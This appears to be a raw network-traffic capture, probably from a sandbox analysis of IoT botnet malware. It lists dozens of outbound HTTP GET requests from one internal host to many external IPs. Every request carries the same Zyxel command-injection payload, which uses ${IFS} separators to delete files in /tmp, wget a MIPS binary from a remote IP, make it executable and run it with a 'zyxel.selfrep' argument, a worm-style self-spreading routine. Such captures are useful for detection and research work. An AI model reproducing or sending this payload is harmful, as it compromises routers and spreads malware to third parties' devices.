                                                Jan 12, 2024 18:16:07.089958906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                424192.168.2.234382083.224.34.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089997053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                425192.168.2.2360556192.227.26.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090023994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                426192.168.2.2336994139.57.165.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090053082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                427192.168.2.2349780187.140.76.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090097904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                428192.168.2.2342776101.99.100.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090137005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                429192.168.2.2337746191.54.20.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090167046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                430192.168.2.2340758208.194.237.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090219021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                431192.168.2.234116863.63.105.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090245008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                432192.168.2.233532251.197.117.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090293884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                433192.168.2.2343330219.231.3.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090307951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                434192.168.2.2337830174.168.170.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090358019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                435192.168.2.235442473.252.247.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090403080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                436192.168.2.234310484.201.236.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090440035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                437192.168.2.2334018170.155.95.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090481043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                438192.168.2.233375882.206.254.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090496063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                439192.168.2.234335023.146.224.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090542078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                440192.168.2.2335792143.87.134.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090573072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                441192.168.2.23592462.251.146.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090622902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                442192.168.2.234945241.166.38.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090675116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                443192.168.2.2355454173.67.109.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090732098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                444192.168.2.2339570128.106.44.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090734005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                445192.168.2.2337048190.99.208.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090749025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                446192.168.2.2337254164.101.111.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090755939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                447192.168.2.236017671.239.176.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090801954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                448192.168.2.2346236125.192.91.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090833902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                449192.168.2.235239078.74.117.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090884924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                450192.168.2.23333029.78.179.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090912104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                451192.168.2.2355116156.3.171.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090959072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                452192.168.2.2345688120.11.134.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.090987921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                453192.168.2.2349296156.27.169.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091039896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                454192.168.2.234286074.219.7.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091068029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                455192.168.2.2342060121.64.98.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091109037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                456192.168.2.2333398181.133.21.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091142893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                457192.168.2.2358048131.60.18.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091181993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                458192.168.2.2360178108.101.159.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091228008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                459192.168.2.2343784222.6.90.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091253042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                460192.168.2.2342442136.54.40.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091280937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                461192.168.2.2346216216.114.219.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091335058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                462192.168.2.234620881.56.208.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091375113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                463192.168.2.2358640110.154.138.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091413021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                464192.168.2.2342156136.229.246.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091449022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                465192.168.2.2337620126.246.242.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091490030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                466192.168.2.233352673.58.61.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091495037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                467192.168.2.235570043.22.150.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091538906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                468192.168.2.234927866.150.202.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091562986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                469192.168.2.23403525.216.9.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091623068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                470192.168.2.235381880.231.234.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091666937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                471192.168.2.2356454139.244.116.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091675043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                472192.168.2.2333198140.215.212.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091712952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                473192.168.2.2339594133.236.7.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091732979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                474192.168.2.2353590157.214.183.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091793060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                475192.168.2.233317492.87.189.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091824055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                476192.168.2.235273459.127.213.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091856956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                477192.168.2.2336750147.184.102.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091902971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                478192.168.2.233763262.140.3.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091944933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                479192.168.2.235136086.167.181.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.091965914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                480192.168.2.233989862.241.124.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092036009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                481192.168.2.234632886.153.50.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092068911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                482192.168.2.234350093.15.25.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092096090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                483192.168.2.2333056130.169.54.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092142105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                484192.168.2.2351906212.159.247.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092161894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                485192.168.2.233574088.109.210.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.092201948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                486192.168.2.2350124176.176.111.91443
                                                TimestampBytes transferredDirectionData
